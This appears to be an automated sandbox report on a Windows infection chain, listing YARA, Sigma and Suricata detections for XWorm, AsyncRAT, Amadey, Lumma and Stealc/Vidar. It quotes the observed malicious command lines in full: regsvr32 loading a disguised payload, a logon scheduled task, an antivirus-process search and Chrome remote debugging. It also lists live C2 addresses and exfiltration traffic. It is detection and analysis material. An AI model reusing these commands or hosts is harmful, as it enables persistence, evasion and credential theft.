29.2.regsvr32.exe.20e131e.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
29.2.regsvr32.exe.20e131e.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
29.2.regsvr32.exe.20e131e.2.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
29.2.regsvr32.exe.20e131e.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
5.2.skotes.exe.c20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
4.2.78K21CNZITPIMAK88B8Q.exe.590000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.c20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.2.skotes.exe.c20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 54 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\regsvr32.exe, ProcessId: 1788, TargetFilename: C:\Users\user\AppData\Local\dllhost.exe

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Source: Process started

Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1788, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 1492, ProcessName: powershell.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Macromedia.com F, ParentImage: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com, ParentProcessId: 1124, ParentProcessName: Macromedia.com, ProcessCommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 4696, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", ProcessId: 2276, ProcessName: wscript.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Avoiding.com L, ParentImage: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com, ParentProcessId: 6532, ParentProcessName: Avoiding.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 612, ProcessName: chrome.exe

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 1788, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50062

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp" /SL5="$50450,1104885,161792,C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp, ParentProcessId: 6120, ParentProcessName: 21a4f8ff7d.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ProcessId: 2820, ProcessName: regsvr32.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe, ParentProcessId: 2300, ParentProcessName: ca3f738a4c.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, ProcessId: 5492, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", ProcessId: 2276, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1788, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 1492, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4828, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1788, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 1492, ProcessName: powershell.exe

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5492, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 4668, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:15.784731+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.21.18.116	443	TCP
2025-02-01T17:18:16.774961+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.18.116	443	TCP
2025-02-01T17:18:18.333756+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.18.116	443	TCP
2025-02-01T17:18:19.458500+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	104.21.18.116	443	TCP
2025-02-01T17:18:20.803299+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.18.116	443	TCP
2025-02-01T17:18:22.495813+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	104.21.18.116	443	TCP
2025-02-01T17:18:24.367512+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	104.21.18.116	443	TCP
2025-02-01T17:18:26.435918+0100	2028371	3	Unknown Traffic	192.168.2.5	49711	104.21.18.116	443	TCP
2025-02-01T17:19:19.574315+0100	2028371	3	Unknown Traffic	192.168.2.5	49993	23.197.127.21	443	TCP

ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:28.924574+0100	2035595	1	Domain Observed Used for C2 Detected	159.100.19.137	7707	192.168.2.5	50030	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:16.275632+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.18.116	443	TCP
2025-02-01T17:18:17.310598+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.18.116	443	TCP
2025-02-01T17:18:26.902954+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49711	104.21.18.116	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:16.275632+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.18.116	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:17.310598+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	104.21.18.116	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:12.821368+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49966	185.215.113.43	80	TCP
2025-02-01T17:19:18.276248+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49991	185.215.113.43	80	TCP
2025-02-01T17:19:23.466522+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49994	185.215.113.43	80	TCP
2025-02-01T17:19:28.360112+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49996	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:18.793726+0100	2059189	1	Domain Observed Used for C2 Detected	192.168.2.5	53367	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:18.890378+0100	2059191	1	Domain Observed Used for C2 Detected	192.168.2.5	52994	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:18.852209+0100	2059199	1	Domain Observed Used for C2 Detected	192.168.2.5	52901	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:18.826083+0100	2059201	1	Domain Observed Used for C2 Detected	192.168.2.5	49399	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:18.840299+0100	2059203	1	Domain Observed Used for C2 Detected	192.168.2.5	65257	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:18.863401+0100	2059207	1	Domain Observed Used for C2 Detected	192.168.2.5	62002	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:18.878067+0100	2059209	1	Domain Observed Used for C2 Detected	192.168.2.5	62952	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:18.812471+0100	2059211	1	Domain Observed Used for C2 Detected	192.168.2.5	56084	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:24.672935+0100	2044247	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.5	50024	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:26.140938+0100	2051831	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.5	50025	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:23.346594+0100	2049087	1	A Network Trojan was detected	192.168.2.5	50022	116.202.5.153	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:27.630840+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50027	116.202.5.153	443	TCP
2025-02-01T17:20:28.978936+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50028	116.202.5.153	443	TCP
2025-02-01T17:20:37.670288+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50053	116.202.5.153	443	TCP
2025-02-01T17:20:38.041100+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50059	116.202.5.153	443	TCP
2025-02-01T17:20:39.120186+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50060	116.202.5.153	443	TCP
2025-02-01T17:20:40.176216+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50061	116.202.5.153	443	TCP
2025-02-01T17:20:42.023998+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50063	116.202.5.153	443	TCP
2025-02-01T17:21:41.003807+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50244	116.202.5.153	443	TCP
2025-02-01T17:21:41.478058+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50250	116.202.5.153	443	TCP
2025-02-01T17:21:42.685831+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50257	116.202.5.153	443	TCP
2025-02-01T17:21:44.746374+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50278	116.202.5.153	443	TCP
2025-02-01T17:21:47.778572+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50289	116.202.5.153	443	TCP
2025-02-01T17:21:48.944126+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50290	116.202.5.153	443	TCP
2025-02-01T17:21:51.237638+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50292	116.202.5.153	443	TCP
2025-02-01T17:22:16.325919+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50312	116.202.5.153	443	TCP
2025-02-01T17:22:17.205228+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50313	116.202.5.153	443	TCP
2025-02-01T17:22:19.031968+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50315	116.202.5.153	443	TCP
2025-02-01T17:22:19.987500+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50316	116.202.5.153	443	TCP
2025-02-01T17:22:21.135996+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50318	116.202.5.153	443	TCP
2025-02-01T17:22:22.231838+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50319	116.202.5.153	443	TCP
2025-02-01T17:22:23.299068+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50321	116.202.5.153	443	TCP
2025-02-01T17:22:24.232013+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50322	116.202.5.153	443	TCP
2025-02-01T17:22:25.288015+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50324	116.202.5.153	443	TCP
2025-02-01T17:22:26.258541+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50325	116.202.5.153	443	TCP
2025-02-01T17:22:27.425696+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50327	116.202.5.153	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:23.031490+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.18.116	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:35.224466+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49728	185.215.113.115	80	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:28.924574+0100	2842478	1	Malware Command and Control Activity Detected	159.100.19.137	7707	192.168.2.5	50030	TCP
2025-02-01T17:20:37.977450+0100	2842478	1	Malware Command and Control Activity Detected	159.100.19.137	7707	192.168.2.5	50058	TCP

ETPRO MALWARE Amadey CnC Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:48.345373+0100	2856121	1	A Network Trojan was detected	192.168.2.5	50078	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:05.671084+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49920	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:12.084030+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	49935	TCP
2025-02-01T17:20:36.948560+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50054	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:08.683572+0100	2803305	3	Unknown Traffic	192.168.2.5	49941	185.215.113.97	80	TCP
2025-02-01T17:19:13.546098+0100	2803305	3	Unknown Traffic	192.168.2.5	49972	185.215.113.97	80	TCP
2025-02-01T17:19:19.023495+0100	2803305	3	Unknown Traffic	192.168.2.5	49992	185.215.113.97	80	TCP
2025-02-01T17:19:24.205270+0100	2803305	3	Unknown Traffic	192.168.2.5	49995	185.215.113.97	80	TCP
2025-02-01T17:20:37.634685+0100	2803305	3	Unknown Traffic	192.168.2.5	50057	185.215.113.97	80	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:38.041100+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50059	116.202.5.153	443	TCP
2025-02-01T17:20:39.120186+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50060	116.202.5.153	443	TCP
2025-02-01T17:20:40.176216+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50061	116.202.5.153	443	TCP
2025-02-01T17:21:41.478058+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50250	116.202.5.153	443	TCP
2025-02-01T17:21:42.685831+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50257	116.202.5.153	443	TCP
2025-02-01T17:21:44.746374+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50278	116.202.5.153	443	TCP
2025-02-01T17:21:47.778572+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50289	116.202.5.153	443	TCP
2025-02-01T17:21:48.944126+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50290	116.202.5.153	443	TCP
2025-02-01T17:21:51.237638+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50292	116.202.5.153	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:20.221830+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49993	23.197.127.21	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:21.710515+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.5	50021	116.202.5.153	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:21:03.451856+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:21:05.877716+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:21:13.877640+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:21:24.554988+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:21:34.752316+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:21:35.838773+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:21:45.297253+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:21:55.713112+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
